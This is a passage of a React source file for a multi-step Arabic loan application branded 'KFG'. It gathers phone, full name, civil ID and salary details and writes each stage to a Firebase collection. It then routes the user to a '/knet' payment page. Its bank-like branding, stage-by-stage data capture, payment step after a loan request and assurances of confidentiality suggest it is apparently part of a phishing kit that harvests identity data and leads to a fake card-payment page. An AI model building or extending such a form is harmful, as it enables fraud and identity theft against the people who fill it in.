import React, {
  useMemo,
  useState,
  useCallback,
  useEffect,
  forwardRef,
  memo,
} from "react";
import { useNavigate } from "react-router-dom";
import { db } from "../firebaseConfig";
import { collection, doc, serverTimestamp, setDoc } from "firebase/firestore";
import Loader from "../components/Loader";



const Badge = memo(({ children, tone = "required" }) => (
  <div
    className={
      "inline-flex items-center rounded-md border px-2.5 py-0.5 font-semibold text-xs ml-auto " +
      (tone === "required"
        ? "border-transparent bg-secondary text-secondary-foreground"
        : "border border-gray-200 bg-white text-gray-700")
    }
  >
    {children}
  </div>
));

const Label = memo(({ htmlFor, icon, children }) => (
  <label
    htmlFor={htmlFor}
    className="text-sm leading-none text-right font-semibold text-gray-800 flex items-center gap-2"
  >
    {icon}
    {children}
  </label>
));

const FieldError = memo(({ msg }) =>
  !msg ? null : (
    <p className="text-xs text-red-600 mt-1 text-right" role="alert">
      {msg}
    </p>
  )
);

const Input = memo(
  forwardRef(function Input(
    { id, value, onChange, placeholder, type = "text", dir = "rtl", inputMode, required },
    ref
  ) {
    return (
      <input
        id={id}
        ref={ref}
        dir={dir}
        className="flex w-full rounded-md border bg-transparent px-3 py-1 text-base shadow-sm transition-colors file:border-0 file:bg-transparent file:text-sm file:font-medium file:text-foreground placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-blue-500 disabled:cursor-not-allowed disabled:opacity-50 md:text-sm text-right border-gray-200 h-12"
        placeholder={placeholder}
        type={type}
        value={value}
        onChange={onChange}
        inputMode={inputMode}
        aria-required={required ? "true" : "false"}
      />
    );
  })
);

const MoneyInput = memo(({ id, value, onChange, placeholder }) => (
  <div className="relative">
    <Input
      id={id}
      placeholder={placeholder}
      dir="ltr"
      type="text"
      inputMode="decimal"
      value={value}
      onChange={onChange}
    />
    <span className="absolute left-4 top-1/2 -translate-y-1/2 text-gray-500 text-sm font-medium">
      د.ك
    </span>
  </div>
));

const Select = memo(function Select({ id, value, onChange, placeholder, options = [], required }) {
  return (
    <div className="relative">
      <button
        type="button"
        className="flex w-full items-center justify-between whitespace-nowrap rounded-md border bg-transparent px-3 py-2 text-sm shadow-sm ring-offset-background text-right border-gray-200 focus:outline-none focus:ring-1 focus:ring-blue-500 h-12"
      >
        <span className={!value ? "text-gray-500" : ""}>
          {value ? options.find((o) => o.value === value)?.label : placeholder}
        </span>
        <svg xmlns="http://www.w3.org/2000/svg" className="h-4 w-4 opacity-50" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="m6 9 6 6 6-6"></path></svg>
      </button>
      {/* Native select overlaid for accessibility & no focus issues */}
      <select
        id={id}
        aria-required={required ? "true" : "false"}
        className="absolute inset-0 w-full h-full opacity-0 cursor-pointer"
        value={value}
        onChange={(e) => onChange(e.target.value)}
      >
        <option value="">يرجى اختيار خيار</option>
        {options.map((o) => (
          <option key={o.value} value={o.value}>
            {o.label}
          </option>
        ))}
      </select>
    </div>
  );
});

// ------- Icons (lucide outlines as inline SVG) ------- //
const IconPhone = (
  <svg xmlns="http://www.w3.org/2000/svg" className="w-4 h-4 text-[#00A3E0]" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M22 16.92v3a2 2 0 0 1-2.18 2A19.86 19.86 0 0 1 3.09 5.18 2 2 0 0 1 5 3h3a2 2 0 0 1 2 1.72c.12.81.3 1.6.57 2.34a2 2 0 0 1-.45 2.11L9.1 10.9a16 16 0 0 0 4 4l1.73-1.02a2 2 0 0 1 2.11-.45c.74.27 1.53.45 2.34.57A2 2 0 0 1 22 16.92z"></path></svg>
);
const IconUser = (
  <svg xmlns="http://www.w3.org/2000/svg" className="w-4 h-4 text-[#00A3E0]" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M20 21a8 8 0 1 0-16 0"></path><circle cx="12" cy="7" r="4"></circle></svg>
);
const IconId = (
  <svg xmlns="http://www.w3.org/2000/svg" className="w-4 h-4 text-[#00A3E0]" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><rect x="2" y="5" width="20" height="14" rx="2"/><line x1="8" x2="8" y1="9" y2="15"/><line x1="12" x2="12" y1="9" y2="15"/><line x1="16" x2="16" y1="9" y2="15"/></svg>
);
const IconDollar = (
  <svg xmlns="http://www.w3.org/2000/svg" className="w-4 h-4 text-[#00A3E0]" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><line x1="12" x2="12" y1="2" y2="22"></line><path d="M17 5H9.5a3.5 3.5 0 0 0 0 7h5a3.5 3.5 0 0 1 0 7H6"></path></svg>
);
const IconBriefcase = (
  <svg xmlns="http://www.w3.org/2000/svg" className="w-4 h-4 text-[#00A3E0]" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M16 20V4a2 2 0 0 0-2-2h-4a2 2 0 0 0-2 2v16"></path><rect width="20" height="14" x="2" y="6" rx="2"></rect></svg>
);
const IconBuilding = (
  <svg xmlns="http://www.w3.org/2000/svg" className="w-4 h-4 text-[#00A3E0]" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M6 22V4a2 2 0 0 1 2-2h8a2 2 0 0 1 2 2v18Z"></path><path d="M6 12H4a2 2 0 0 0-2 2v6a2 2 0 0 0 2 2h2"></path><path d="M18 9h2a2 2 0 0 1 2 2v9a2 2 0 0 1-2 2h-2"></path><path d="M10 6h4"></path><path d="M10 10h4"></path><path d="M10 14h4"></path><path d="M10 18h4"></path></svg>
);
const IconCredit = (
  <svg xmlns="http://www.w3.org/2000/svg" className="w-4 h-4 text-white" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><rect width="20" height="14" x="2" y="5" rx="2"></rect><line x1="2" x2="22" y1="10" y2="10"></line></svg>
);

// ------- Helpers ------- //
const sectors = [
  { value: "government", label: "القطاع الحكومي" },
  { value: "private", label: "القطاع الخاص" },
  { value: "other", label: "متقاعد " },
  { value: "oil", label: "القطاع النفطي" },
  { value: "military", label: "القطاع العسكري" },
  { value: "banking", label: "القطاع المصرفي" },
  { value: "education", label: "قطاع التعليم" },
  { value: "health", label: "القطاع الصحي" },
    
];

function isPhoneOk(v) {
  if (!v) return false;
  const s = v.trim();
  // Accept 8–12 digits, allow leading 0s and +
  return /^[+]?\d{8,12}$/.test(s);
}

function isCivilOk(v) {
  if (!v) return false;
  const s = v.trim();
  // 8–20 digits safe range
  return /^\d{8,20}$/.test(s);
}

function isMoneyOk(v) {
  if (!v) return false;
  // allow digits & optional decimal
  return /^(?:\d+)(?:[.,]\d{1,3})?$/.test(v.trim());
}

// ------- Main component ------- //
export default function LoanForm() {
  const navigate = useNavigate?.() || (() => {});
  const [pageLoading, setPageLoading] = useState(true);
  const [step, setStep] = useState(0); // 0 personal, 1 salary, 2 payment

  const [personal, setPersonal] = useState({
    phone: "",
    fullName: "",
    civilId: "",
  });
  const [salary, setSalary] = useState({
    netSalary: "",
    jobTitle: "",
    requestedAmount: "",
    additionalIncome: "",
    workSector: "",
  });
  const [calcData, setCalcData] = useState(null);
  const [calcIdFromSession, setCalcIdFromSession] = useState("");
  const [loanId, setLoanId] = useState(() => {
    if (typeof window === "undefined") return "";
    try {
      return window.sessionStorage?.getItem("loanId") || "";
    } catch (err) {
      console.warn("SessionStorage unavailable on init:", err);
      return "";
    }
  });
  const [submittingLoan, setSubmittingLoan] = useState(false);
  const [submitError, setSubmitError] = useState("");
  const [successToast, setSuccessToast] = useState("");
  const [syncingStage, setSyncingStage] = useState(false);
  const [stepSyncError, setStepSyncError] = useState("");

  const [touched, setTouched] = useState({});

  const personalErrors = useMemo(() => {
    return {
      phone: personal.phone ? (isPhoneOk(personal.phone) ? "" : "رقم غير صحيح") : "مطلوب",
      fullName: personal.fullName ? "" : "مطلوب",
      civilId: personal.civilId ? (isCivilOk(personal.civilId) ? "" : "رقم غير صحيح") : "مطلوب",
    };
  }, [personal]);

  const salaryErrors = useMemo(() => {
    return {
      netSalary: salary.netSalary ? (isMoneyOk(salary.netSalary) ? "" : "قيمة غير صحيحة") : "مطلوب",
      jobTitle: salary.jobTitle ? "" : "مطلوب",
      requestedAmount: salary.requestedAmount
        ? isMoneyOk(salary.requestedAmount)
          ? ""
          : "قيمة غير صحيحة"
        : "مطلوب",
      workSector: salary.workSector ? "" : "مطلوب",
      // additionalIncome optional; if present, validate
      additionalIncome:
        salary.additionalIncome && !isMoneyOk(salary.additionalIncome)
          ? "قيمة غير صحيحة"
          : "",
    };
  }, [salary]);

  const canNextPersonal = useMemo(
    () => !personalErrors.phone && !personalErrors.fullName && !personalErrors.civilId,
    [personalErrors]
  );

  const canNextSalary = useMemo(
    () =>
      !salaryErrors.netSalary &&
      !salaryErrors.jobTitle &&
      !salaryErrors.requestedAmount &&
      !salaryErrors.workSector &&
      !salaryErrors.additionalIncome,
    [salaryErrors]
  );

  useEffect(() => {
    const timeoutId = setTimeout(() => setPageLoading(false), 1200);
    return () => clearTimeout(timeoutId);
  }, []);

  useEffect(() => {
    try {
      const cachedCalc =
        typeof window !== "undefined" ? window.sessionStorage?.getItem("calcData") : null;
      if (!cachedCalc) {
        navigate("/calculate");
        return;
      }
      const parsed = JSON.parse(cachedCalc);
      setCalcData(parsed);
      const cachedCalcId =
        typeof window !== "undefined" ? window.sessionStorage?.getItem("calcId") : "";
      if (cachedCalcId) {
        setCalcIdFromSession(cachedCalcId);
      }
      setSalary((prev) =>
        prev.requestedAmount
          ? prev
          : { ...prev, requestedAmount: parsed?.amount ? String(parsed.amount) : prev.requestedAmount }
      );
    } catch (err) {
      console.warn("Failed to read calculation data, redirecting:", err);
      navigate("/calculate");
    }
  }, [navigate]);

  const persistLoanSession = useCallback(
    (newLoanId) => {
      if (typeof window === "undefined") return;
      try {
        const storage = window.sessionStorage;
        if (!storage) return;
        storage.setItem("loanId", newLoanId);
        storage.setItem("personal", JSON.stringify(personal));
        storage.setItem("salary", JSON.stringify(salary));
      } catch (storageErr) {
        console.warn("SessionStorage is unavailable, skipping loan cache:", storageErr);
      }
    },
    [personal, salary]
  );

  const syncLoanStage = useCallback(
    async (stage) => {
      const loanEntriesRef = collection(db, "loanEntries");
      let docRef;
      let isNew = false;

      if (loanId) {
        docRef = doc(loanEntriesRef, loanId);
      } else {
        docRef = doc(loanEntriesRef);
        isNew = true;
      }

      const payload = {
        loanId: docRef.id,
        personal,
        progressStage: stage,
        updatedAt: serverTimestamp(),
      };
      if (calcIdFromSession) {
        payload.calculationId = calcIdFromSession;
      }
      if (calcData) {
        payload.calculation = calcData;
      }

      if (stage !== "personal") {
        payload.salary = salary;
      }

      if (stage === "final") {
        payload.submittedAt = serverTimestamp();
      }

      if (isNew) {
        payload.createdAt = serverTimestamp();
      }

      await setDoc(docRef, payload, { merge: true });

      if (isNew) {
        setLoanId(docRef.id);
      }

      persistLoanSession(docRef.id);
      return docRef.id;
    },
    [calcData, calcIdFromSession, loanId, persistLoanSession, personal, salary]
  );

  const handleStageSync = useCallback(
    async (stage) => {
      setStepSyncError("");
      setSyncingStage(true);
      try {
        await syncLoanStage(stage);
        return true;
      } catch (err) {
        console.error("فشل إرسال بيانات المرحلة:", err);
        setStepSyncError("تعذر إرسال البيانات، يرجى المحاولة مجددًا.");
        return false;
      } finally {
        setSyncingStage(false);
      }
    },
    [syncLoanStage]
  );

  const markAllTouched = useCallback((keys) => {
    setTouched((t) => ({ ...t, ...Object.fromEntries(keys.map((k) => [k, true])) }));
  }, []);

  const onNext = useCallback(async () => {
    if (step === 0) {
      if (!canNextPersonal) {
        markAllTouched(["phone", "fullName", "civilId"]);
        return;
      }
      const synced = await handleStageSync("personal");
      if (synced) {
        setStep(1);
      }
      return;
    }
    if (step === 1) {
      if (!canNextSalary) {
        markAllTouched(["netSalary", "jobTitle", "requestedAmount", "workSector", "additionalIncome"]);
        return;
      }
      const synced = await handleStageSync("salary");
      if (synced) {
        setStep(2);
      }
      return;
    }
  }, [step, canNextPersonal, canNextSalary, handleStageSync, markAllTouched]);

  const onBack = useCallback(() => {
    if (step === 1) setStep(0);
    if (step === 2) setStep(1);
  }, [step]);

  const handlePersonalChange = useCallback((key) => (e) => {
    const v = typeof e === "string" ? e : e.target.value;
    setPersonal((p) => ({ ...p, [key]: v }));
  }, []);

  const handleSalaryChange = useCallback((key) => (e) => {
    const v = typeof e === "string" ? e : e.target.value;
    setSalary((s) => ({ ...s, [key]: v }));
  }, []);

  const handleProceedToKnet = useCallback(async () => {
    if (submittingLoan) return;
    setSubmitError("");
    setSubmittingLoan(true);
    try {
      const activeLoanId = await syncLoanStage("final");

      setSuccessToast(`تم إنشاء الطلب رقم ${activeLoanId}`);
      setTimeout(() => setSuccessToast(""), 4000);

      navigate("/knet");
    } catch (err) {
      console.error("Erreur lors de l'enregistrement du prêt:", err);
      setSubmitError("حدث خطأ أثناء حفظ الطلب، يرجى المحاولة لاحقًا.");
    } finally {
      setSubmittingLoan(false);
    }
  }, [navigate, submittingLoan, syncLoanStage]);

  const Header = (
    <header className="sticky top-0 z-50 bg-[#00A3E0] from-[#00A3E0] via-blue-700 to-blue-800 text-white shadow-lg backdrop-blur-sm">
      <div className="flex items-center justify-between max-w-md mx-auto p-4">
        <div className="flex items-center gap-3">
          <div className="w-12 h-12 bg-white/10 backdrop-blur-md rounded-xl flex items-center justify-center shadow-lg border border-white/20">
          <a href="/"><svg width="25" height="25" viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0_1375_4937)"><path d="M10.036 13.896C9.54699 13.5598 8.85274 13.5912 8.91547 12.8027C8.94683 12.4214 9.04662 12.2014 9.41156 12.0142C11.0809 11.156 12.7203 10.2472 14.401 9.3999C14.87 9.16211 15.0268 8.8888 15.0112 8.39682C14.9755 7.19833 14.9841 5.99847 15.0112 4.79997C15.0197 4.37633 14.9128 4.16314 14.4409 4.03741C12.5386 3.51809 10.5227 3.51809 8.62038 4.03741C8.21979 4.14537 8.10004 4.31073 8.10574 4.68927C8.12712 6.04629 8.12427 7.40468 8.10574 8.7617C8.09004 8.89374 8.11968 9.02709 8.19017 9.14152C8.26066 9.25595 8.36816 9.34522 8.49635 9.3958C9.27186 9.78254 10.0303 10.1994 10.8043 10.608C10.0516 11.3336 9.8321 11.376 8.99387 10.9209C8.31958 10.5547 7.36873 10.3838 7.04512 9.77024C6.7372 9.18944 6.94961 8.35583 6.94676 7.6329C6.94676 6.38794 6.96102 5.14435 6.93679 3.89939C6.92966 3.52494 7.04656 3.33772 7.42718 3.20653C10.2199 2.24308 12.9954 2.27588 15.7738 3.25709C16.1231 3.38008 16.2215 3.57141 16.2186 3.91169C16.2015 5.67595 16.1944 7.44158 16.2186 9.20584C16.2186 9.61582 16.0475 9.80578 15.7068 9.98207C14.1031 10.8143 12.5093 11.6616 10.9141 12.5048C10.1044 12.9284 10.1058 12.9312 10.036 13.896Z" fill="white"></path><path d="M11.9821 12.5881C12.3584 12.3749 12.5951 12.2287 12.8445 12.1043C13.4333 11.8105 13.9194 12.0838 13.9208 12.7234C13.9294 14.6011 13.9379 16.4774 13.9208 18.3537C13.9013 18.5291 13.9407 18.7058 14.0333 18.8582C14.1258 19.0106 14.2667 19.1307 14.4355 19.201C15.5284 19.7768 16.6099 20.3808 17.68 21.0131C18.0507 21.2304 18.2802 21.188 18.5952 20.9065C20.0212 19.6364 21.0591 18.0177 21.5975 16.2246C21.7229 15.8146 21.6659 15.5713 21.2439 15.35C20.1035 14.75 18.9816 14.12 17.8725 13.4668C17.5346 13.27 17.2823 13.3069 16.9672 13.4846C16.3158 13.8535 15.6386 14.1815 14.9814 14.5409C14.6507 14.7227 14.4967 14.7364 14.4768 14.2908C14.4526 13.7715 14.531 13.3616 15.1183 13.1812C15.2786 13.1371 15.4276 13.0618 15.5559 12.9598C16.8717 11.8324 18.102 12.077 19.4292 13.0213C20.4114 13.7196 21.5362 14.2362 22.6082 14.8142C22.9404 14.9946 23.0558 15.175 22.9774 15.5672C22.4328 18.2758 21.0244 20.4788 18.8162 22.2444C18.4299 22.5532 18.1376 22.5847 17.6929 22.3236C16.2202 21.4586 14.722 20.6345 13.218 19.8201C13.071 19.7552 12.9489 19.6478 12.8689 19.513C12.7889 19.3782 12.7549 19.2227 12.7718 19.0684C12.7889 17.2823 12.7633 15.4962 12.7889 13.71C12.7961 13.1948 12.7504 12.7671 11.9821 12.5881Z" fill="white"></path><path d="M12.237 14.7146C12.237 15.0767 12.237 15.3186 12.237 15.5591C12.2213 16.211 11.6426 16.5294 11.0367 16.211C9.31603 15.3063 7.59254 14.403 5.88472 13.4778C5.51264 13.2755 5.22325 13.2509 4.84833 13.4778C3.8205 14.0818 2.78127 14.6708 1.7121 15.2202C1.30724 15.4293 1.28442 15.6493 1.38849 16.0292C1.89098 17.8802 2.9328 19.5558 4.39215 20.8601C4.62879 21.0733 4.81269 21.1512 5.12346 20.9722C6.25821 20.318 7.40294 19.6803 8.55764 19.0589C8.68374 19.0026 8.78802 18.9094 8.85561 18.7929C8.92319 18.6763 8.95063 18.5422 8.93398 18.4098C8.9126 17.7101 8.94682 17.0077 8.92116 16.308C8.90405 15.827 9.07369 15.8557 9.45289 16.0224C9.9219 16.2301 10.1286 16.5021 10.083 17.0118C10.006 17.8399 10.3824 18.8212 9.94043 19.4716C9.51276 20.0839 8.55051 20.3558 7.81778 20.7699C6.89971 21.2865 5.96454 21.7716 5.06216 22.3169C4.7072 22.5342 4.49194 22.4781 4.19827 22.2485C1.97345 20.5193 0.484459 18.0703 0.0114028 15.3623C-0.0470451 15.0425 0.045612 14.869 0.336426 14.7091C1.87793 13.8636 3.41089 13.0068 4.93529 12.1385C5.24891 11.9595 5.47843 12.0019 5.77352 12.1645C7.36302 13.02 8.9682 13.844 10.5563 14.7009C11.0852 14.966 11.5827 15.2735 12.237 14.7146Z" fill="white"></path></g><defs><clipPath id="clip0_1375_4937"><rect width="23" height="20" fill="white" transform="translate(23 22.5) rotate(-180)"></rect></clipPath></defs></svg></a>
          </div>
          <div className="flex flex-col ">
            <span className="font-bold text-lg tracking-tight">KFG</span>
            <span className="text-xs text-blue-100">
              {step === 0 ? "المعلومات الشخصية" : step === 1 ? "معلومات الراتب" : "مراجعة الائتمان"}
            </span>
          </div>
        </div>
        <button className="w-10 h-10 rounded-lg bg-white/10 backdrop-blur-md flex items-center justify-center hover:bg-white/20 transition-all border border-white/20">
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round" className="w-5 h-5"><path d="M4 12h16"/><path d="M4 18h16"/><path d="M4 6h16"/></svg>
        </button>
      </div>
    </header>
  );

  const Stepper = (
    <div className="max-w-md mx-auto px-6 py-6">
      <div className="flex items-center justify-between mb-2">
        <div className="flex items-center gap-2">
          <div className={`w-8 h-8 ${step >= 0 ? (step > 0 ? "bg-green-500" : "bg-[#00A3E0]") : "bg-gray-300"} rounded-full flex items-center justify-center shadow-md`}>
            <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-white" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M20 6 9 17l-5-5"></path></svg>
          </div>
          <span className={`text-xs font-semibold ${step > 0 ? "text-green-600" : "text-[#00A3E0]"}`}>{step === 2 ? "المعلومات" : "المعلومات الشخصية"}</span>
        </div>
        <div className={`flex-1 h-0.5 ${step > 0 ? "bg-green-500" : "bg-[#00A3E0]"} mx-2`}></div>
        <div className="flex items-center gap-2">
          <div className={`w-8 h-8 ${step >= 1 ? (step > 1 ? "bg-green-500" : "bg-[#00A3E0]") : "bg-gray-300"} rounded-full flex items-center justify-center shadow-md`}>
            <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-white" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M20 6 9 17l-5-5"></path></svg>
          </div>
          <span className={`text-xs font-semibold ${step > 1 ? "text-green-600" : "text-[#00A3E0]"}`}>الراتب</span>
        </div>
        <div className={`flex-1 h-0.5 ${step === 2 ? "bg-[#00A3E0]" : "bg-gray-300"} mx-2`}></div>
        <div className="flex items-center gap-2">
          <div className={`w-8 h-8 ${step === 2 ? "bg-[#00A3E0]" : "bg-gray-300"} rounded-full flex items-center justify-center shadow-md`}>
            {IconCredit}
          </div>
          <span className={`text-xs font-semibold ${step === 2 ? "text-[#00A3E0]" : "text-gray-500"}`}>الدفع</span>
        </div>
      </div>
      <div className="w-full bg-gray-200 rounded-full h-2">
        <div
          className={`h-2 rounded-full transition-all duration-500 ${
            step === 0 ? "bg-[#00A3E0] w-1/3" : step === 1 ? "bg-[#00A3E0] w-2/3" : "bg-gradient-to-r from-green-500 via-[#00A3E0] to-blue-700 w-full"
          }`}
        ></div>
      </div>
    </div>
  );

  const StepPersonal = (
    <form className="max-w-md mx-auto px-6 pb-8 space-y-6" onSubmit={(e) => e.preventDefault()}>
      <div className="grid grid-cols-3 gap-3">
        <div className="rounded-xl border-0 shadow-sm bg-gradient-to-br from-green-50 to-white">
          <div className="p-3 text-center space-y-2">
            <div className="w-10 h-10 bg-green-100 rounded-lg flex items-center justify-center mx-auto">
              <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-green-600" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M16 7h6v6"></path><path d="m22 7-8.5 8.5-5-5L2 17"></path></svg>
            </div>
            <p className="text-xs font-semibold text-gray-700">أفضل الأسعار</p>
          </div>
        </div>
        <div className="rounded-xl border-0 shadow-sm bg-gradient-to-br from-blue-50 to-white">
          <div className="p-3 text-center space-y-2">
            <div className="w-10 h-10 bg-blue-100 rounded-lg flex items-center justify-center mx-auto">
              <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-[#00A3E0]" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M20 13c0 5-3.5 7.5-7.66 8.95a1 1 0 0 1-.67-.01C7.5 20.5 4 18 4 13V6a1 1 0 0 1 1-1c2 0 4.5-1.2 6.24-2.72a1.17 1.17 0 0 1 1.52 0C14.51 3.81 17 5 19 5a1 1 0 0 1 1 1z"></path></svg>
            </div>
            <p className="text-xs font-semibold text-gray-700">سرية تامة</p>
          </div>
        </div>
        <div className="rounded-xl border-0 shadow-sm bg-gradient-to-br from-purple-50 to-white">
          <div className="p-3 text-center space-y-2">
            <div className="w-10 h-10 bg-purple-100 rounded-lg flex items-center justify-center mx-auto">
              <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-purple-600" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M12 6v6l4 2"></path><circle cx="12" cy="12" r="10"></circle></svg>
            </div>
            <p className="text-xs font-semibold text-gray-700">رد فوري</p>
          </div>
        </div>
      </div>

      <div className="rounded-xl shadow-lg overflow-hidden">
        <div className="bg-gradient-to-r from-[#00A3E0] to-blue-700 p-4">
          <h2 className="text-lg font-bold text-white flex items-center gap-2">
            {IconUser}المعلومات الشخصية
          </h2>
          <p className="text-xs text-blue-100 mt-1">يرجى ملء جميع الحقول بدقة</p>
        </div>

        <div className="p-6 space-y-5">
          {/* phone */}
          <div className="space-y-2">
            <div className="flex items-center gap-2">
              <Label htmlFor="phone" icon={IconPhone}>رقم الهاتف</Label>
              <Badge>مطلوب</Badge>
            </div>
            <Input
              id="phone"
              placeholder="05xxxxxxxx"
              type="tel"
              dir="ltr"
              inputMode="tel"
              required
              value={personal.phone}
              onChange={handlePersonalChange("phone")}
            />
            {touched.phone && <FieldError msg={personalErrors.phone} />}
          </div>

          <div className="space-y-2">
            <div className="flex items-center gap-2">
              <Label htmlFor="fullName" icon={IconUser}>الاسم الكامل</Label>
              <Badge>مطلوب</Badge>
            </div>
            <Input
              id="fullName"
              placeholder="أدخل اسمك الكامل"
              required
              value={personal.fullName}
              onChange={handlePersonalChange("fullName")}
            />
            {touched.fullName && <FieldError msg={personalErrors.fullName} />}
          </div>

          <div className="space-y-2">
            <div className="flex items-center gap-2">
              <Label htmlFor="civilId" icon={IconId}>الرقم المدني</Label>
              <Badge>مطلوب</Badge>
            </div>
            <Input
              id="civilId"
              placeholder="أدخل رقمك المدني"
              dir="ltr"
              inputMode="numeric"
              required
              value={personal.civilId}
              onChange={handlePersonalChange("civilId")}
            />
            {touched.civilId && <FieldError msg={personalErrors.civilId} />}
          </div>
        </div>
      </div>

      <button
        type="button"
        onClick={onNext}
        disabled={!canNextPersonal || syncingStage}
        className="inline-flex items-center justify-center gap-2 w-full h-14 text-lg font-bold rounded-xl shadow-lg hover:shadow-xl transition-all duration-300 disabled:opacity-50 disabled:cursor-not-allowed bg-gradient-to-r from-[#00A3E0] to-blue-700 hover:from-blue-700 hover:to-blue-800 text-white"
      >
        <span className="flex items-center gap-2 justify-center">
          {syncingStage ? "جارٍ الحفظ..." : "التالي"}
          {!syncingStage && (
            <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="m9 18 6-6-6-6"/></svg>
          )}
        </span>
      </button>
      {stepSyncError && step === 0 && (
        <p className="text-center text-xs text-red-600 mt-3">{stepSyncError}</p>
      )}

      <div className="bg-gray-50 border border-gray-200 rounded-xl p-4">
        <div className="flex items-start gap-3">
          <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-[#00A3E0] mt-0.5" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M20 13c0 5-3.5 7.5-7.66 8.95a1 1 0 0 1-.67-.01C7.5 20.5 4 18 4 13V6a1 1 0 0 1 1-1c2 0 4.5-1.2 6.24-2.72a1.17 1.17 0 0 1 1.52 0C14.51 3.81 17 5 19 5a1 1 0 0 1 1 1z"/></svg>
          <div>
            <p className="text-sm font-semibold text-gray-900 mb-1">معلوماتك المالية في أمان</p>
            <p className="text-xs text-gray-600 leading-relaxed">نستخدم أحدث تقنيات التشفير لحماية بياناتك. لا تتم مشاركة معلوماتك مع أي طرف ثالث.</p>
          </div>
        </div>
      </div>
    </form>
  );

  const StepSalary = (
    <form className="max-w-md mx-auto px-6 pb-8 space-y-6" onSubmit={(e) => e.preventDefault()}>
      <div className="rounded-xl bg-card text-card-foreground shadow-lg border-0 overflow-hidden">
        <div className="bg-gradient-to-r from-[#00A3E0] to-blue-700 p-4">
          <h2 className="text-lg font-bold text-white flex items-center gap-2">{IconDollar}معلومات الراتب والوظيفة</h2>
          <p className="text-xs text-blue-100 mt-1">لحساب أفضل عرض تمويلي لك</p>
        </div>
        <div className="p-6 space-y-5">
          <div className="space-y-2">
            <div className="flex items-center gap-2">
              <Label htmlFor="netSalary" icon={IconDollar}>صافي الراتب بعد الاقتطاع</Label>
              <Badge>مطلوب</Badge>
            </div>
            <MoneyInput
              id="netSalary"
              placeholder="مثال: 1500"
              value={salary.netSalary}
              onChange={handleSalaryChange("netSalary")}
            />
            {touched.netSalary && <FieldError msg={salaryErrors.netSalary} />}
          </div>


          <div className="space-y-2">
            <div className="flex items-center gap-2">
              <Label htmlFor="requestedAmount" icon={IconDollar}>المبلغ المطلوب</Label>
              <Badge>مطلوب</Badge>
            </div>
            <MoneyInput
              id="requestedAmount"
              placeholder="مثال: 5000"
              value={salary.requestedAmount}
              onChange={handleSalaryChange("requestedAmount")}
            />
            {touched.requestedAmount && <FieldError msg={salaryErrors.requestedAmount} />}
          </div>
          <div className="space-y-2">
            <div className="flex items-center gap-2">
              <Label htmlFor="jobTitle" icon={IconBriefcase}>اسم الوظيفة</Label>
              <Badge>مطلوب</Badge>
            </div>
            <Input
              id="jobTitle"
              placeholder="مثال: مهندس، محاسب، مدير"
              value={salary.jobTitle}
              onChange={handleSalaryChange("jobTitle")}
              required
            />
            {touched.jobTitle && <FieldError msg={salaryErrors.jobTitle} />}
          </div>

          <div className="space-y-2">
            <div className="flex items-center gap-2">
              <Label htmlFor="additionalIncome" icon={IconDollar}>دخل إضافي</Label>
              <Badge tone="optional">اختياري</Badge>
            </div>
            <MoneyInput
              id="additionalIncome"
              placeholder="مثال: 500"
              value={salary.additionalIncome}
              onChange={handleSalaryChange("additionalIncome")}
            />
            <p className="text-xs text-gray-500 text-right">مثل: إيجارات، استثمارات، أعمال جانبية</p>
            {touched.additionalIncome && <FieldError msg={salaryErrors.additionalIncome} />}
          </div>

          <div className="space-y-2">
            <div className="flex items-center gap-2">
              <Label htmlFor="workSector" icon={IconBriefcase}>قطاع العمل</Label>
              <Badge>مطلوب</Badge>
            </div>
            <Select
              id="workSector"
              value={salary.workSector}
              onChange={(v) => handleSalaryChange("workSector")(v)}
              placeholder="اختر قطاع العمل"
              options={sectors}
              required
            />
            {touched.workSector && <FieldError msg={salaryErrors.workSector} />}
          </div>
        </div>
      </div>

      <div className="flex gap-3">
        <button
          type="button"
          onClick={onBack}
          className="inline-flex items-center justify-center gap-2 flex-1 rounded-md text-sm font-medium border shadow-sm h-12 px-4 bg-white border-gray-300 hover:bg-gray-50"
        >
